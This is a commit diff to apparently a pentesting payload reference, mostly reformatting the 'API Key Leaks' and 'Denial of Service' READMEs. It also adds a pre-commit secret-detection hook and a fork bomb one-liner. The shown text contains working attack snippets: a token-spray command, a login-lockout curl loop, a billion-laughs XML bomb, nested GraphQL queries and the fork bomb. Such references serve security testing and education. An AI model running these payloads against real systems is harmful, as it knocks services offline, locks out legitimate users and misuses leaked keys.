XXE - Fix typo

Author: swisskyrepo

API Key Leaks/README.md

@@ -5,12 +5,12 @@
 ## Summary
 
 - [Tools](#tools)
-- [Methodology](#exploit)
+- [Methodology](#methodology)
     - [Common Causes of Leaks](#common-causes-of-leaks)
     - [Validate The API Key](#validate-the-api-key)
+- [Reducing The Attack Surface](#reducing-the-attack-surface)
 - [References](#references)
 
-
 ## Tools
 
 - [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
@@ -21,26 +21,26 @@
 - [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
 - [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place
 - [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints
+
     ```powershell
     nuclei -t token-spray/ -var token=token_list.txt
     ```
 
-
 ## Methodology
 
-* **API Keys**: Unique identifiers used to authenticate requests associated with your project or application.
-* **Tokens**: Security tokens (like OAuth tokens) that grant access to protected resources.
-     
+- **API Keys**: Unique identifiers used to authenticate requests associated with your project or application.
+- **Tokens**: Security tokens (like OAuth tokens) that grant access to protected resources.
+
 ### Common Causes of Leaks
 
-* **Hardcoding in Source Code**: Developers may unintentionally leave API keys or tokens directly in the source code.
+- **Hardcoding in Source Code**: Developers may unintentionally leave API keys or tokens directly in the source code.
 
-    ```py     
+    ```py
     # Example of hardcoded API key
     api_key = "1234567890abcdef"
     ```
 
-* **Public Repositories**: Accidentally committing sensitive keys and tokens to publicly accessible version control systems like GitHub.
+- **Public Repositories**: Accidentally committing sensitive keys and tokens to publicly accessible version control systems like GitHub.
 
     ```ps1
     ## Scan a Github Organization
@@ -50,17 +50,16 @@
     docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
     ```
 
-* **Hardcoding in Docker Images**: API keys and credentials might be hardcoded in Docker images hosted on DockerHub or private registries.
+- **Hardcoding in Docker Images**: API keys and credentials might be hardcoded in Docker images hosted on DockerHub or private registries.
 
     ```ps1
     # Scan a Docker image for verified secrets
     docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
     ```
 
-* **Logs and Debug Information**: Keys and tokens might be inadvertently logged or printed during debugging processes.
-
-* **Configuration Files**: Including keys and tokens in publicly accessible configuration files (e.g., .env files, config.json, settings.py, or .aws/credentials.).
+- **Logs and Debug Information**: Keys and tokens might be inadvertently logged or printed during debugging processes.
 
+- **Configuration Files**: Including keys and tokens in publicly accessible configuration files (e.g., .env files, config.json, settings.py, or .aws/credentials.).
 
 ### Validate The API Key
 
@@ -80,16 +79,29 @@ patterns:
 
 Use [streaak/keyhacks](https://github.com/streaak/keyhacks) or read the documentation of the service to find a quick way to verify the validity of an API key.
 
-* **Example**: Telegram Bot API Token
+- **Example**: Telegram Bot API Token
 
     ```ps1
     curl https://api.telegram.org/bot<TOKEN>/getMe
     ```
 
+## Reducing The Attack Surface
+
+Check the existence of a private key or AWS credentials before commiting your changes in a GitHub repository.
+
+Add these lines to your `.pre-commit-config.yaml` file.
+
+```yml
+-   repo: https://github.com/pre-commit/pre-commit-hooks
+    rev: v3.2.0
+    hooks:
+    -   id: detect-aws-credentials
+    -   id: detect-private-key
+```
 
 ## References
 
-* [Finding Hidden API Keys & How to Use Them - Sumit Jain - August 24, 2019](https://web.archive.org/web/20191012175520/https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
-* [Introducing SignSaboteur: Forge Signed Web Tokens with Ease - Zakhar Fedotkin - May 22, 2024](https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease)
-* [Private API Key Leakage Due to Lack of Access Control - yox - August 8, 2018](https://hackerone.com/reports/376060)
-* [Saying Goodbye to My Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
+- [Finding Hidden API Keys & How to Use Them - Sumit Jain - August 24, 2019](https://web.archive.org/web/20191012175520/https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
+- [Introducing SignSaboteur: Forge Signed Web Tokens with Ease - Zakhar Fedotkin - May 22, 2024](https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease)
+- [Private API Key Leakage Due to Lack of Access Control - yox - August 8, 2018](https://hackerone.com/reports/376060)
+- [Saying Goodbye to My Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)

Denial of Service/README.md

@@ -2,7 +2,6 @@
 
 > A Denial of Service (DoS) attack aims to make a service unavailable by overwhelming it with a flood of illegitimate requests or exploiting vulnerabilities in the target's software to crash or degrade performance. In a Distributed Denial of Service (DDoS), attackers use multiple sources (often compromised machines) to perform the attack simultaneously.
 
-
 ## Summary
 
 * [Methodology](#methodology)
@@ -11,27 +10,25 @@
     * [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related)
 * [References](#references)
 
-
 ## Methodology
 
 Here are some examples of Denial of Service (DoS) attacks. These examples should serve as a reference for understanding the concept, but any DoS testing should be conducted cautiously, as it can disrupt the target environment and potentially result in loss of access or exposure of sensitive data.
 
-
 ### Locking Customer Accounts
 
-Example of Denial of Service that can occur when testing customer accounts. 
+Example of Denial of Service that can occur when testing customer accounts.
 Be very careful as this is most likely **out-of-scope** and can have a high impact on the business.
 
 * Multiple attempts on the login page when the account is temporary/indefinitely banned after X bad attempts.
+
     ```ps1
     for i in {1..100}; do curl -X POST -d "username=user&password=wrong" <target_login_url>; done
     ```
 
-
 ### File Limits on FileSystem
 
 When a process is writing a file on the server, try to reach the maximum number of files allowed by the filesystem format. The system should output a message: `No space left on device` when the limit is reached.
- 
+
 | Filesystem | Maximum Inodes |
 | ---        | --- |
 | BTRFS      | 2^64 (~18 quintillion) |
@@ -47,12 +44,12 @@ FAT32 has a significant limitation of **4 GB**, which is why it's often replaced
 
 Modern filesystems like BTRFS, ZFS, and XFS support exabyte-scale files, well beyond current storage capacities, making them future-proof for large datasets.
 
-
 ### Memory Exhaustion - Technology Related
 
 Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory.
 
 * **XML External Entity**: Billion laughs attack/XML bomb
+
     ```xml
     <?xml version="1.0"?>
     <!DOCTYPE lolz [
@@ -70,7 +67,9 @@ Depending on the technology used by the website, an attacker may have the abilit
     ]>
     <lolz>&lol9;</lolz>
     ```
+
 * **GraphQL**: Deeply-nested GraphQL queries.
+
     ```ps1
     query { 
         repository(owner:"rails", name:"rails") {
@@ -86,12 +85,17 @@ Depending on the technology used by the website, an attacker may have the abilit
         }
     }
     ```
+
 * **Image Resizing**: try to send invalid pictures with modified headers, e.g: abnormal size, big number of pixels.
 * **SVG handling**: SVG file format is based on XML, try the billion laughs attack.
 * **Regular Expression**: ReDoS
+* **Fork Bomb**: rapidly creates new processes in a loop, consuming system resources until the machine becomes unresponsive.
 
+    ```ps1
+    :(){ :|:& };:
+    ```
 
 ## References
 
-- [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - October 16, 2024](https://youtu.be/b7WlUofPJpU)
-- [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series - July 16, 2019](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)
+* [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - October 16, 2024](https://youtu.be/b7WlUofPJpU)
+* [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series - July 16, 2019](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)